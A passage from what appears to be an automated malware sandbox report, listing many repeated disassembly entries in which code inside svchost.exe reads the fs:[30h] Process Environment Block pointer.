            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]1_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]1_2_038BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]1_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]1_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]1_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]1_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]1_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]1_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]1_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]1_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]1_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]1_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]1_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]1_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]1_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]1_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]1_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]1_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]1_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]1_2_038EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]1_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]1_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]1_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]1_2_038304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]1_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]1_2_038EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]1_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]1_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]1_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]1_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]1_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]1_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h]1_2_03904B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h]1_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h]1_2_038D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828B50 mov eax, dword ptr fs:[00000030h]1_2_03828B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h]1_2_038DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h]1_2_0382CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h]1_2_03904A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h]1_2_03868A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h]1_2_03886AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h]1_2_03830AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h]1_2_038BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h]1_2_0386CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h]1_2_0385EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h] (13 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038309AD mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h] (2 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h] (6 identical rows)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h]
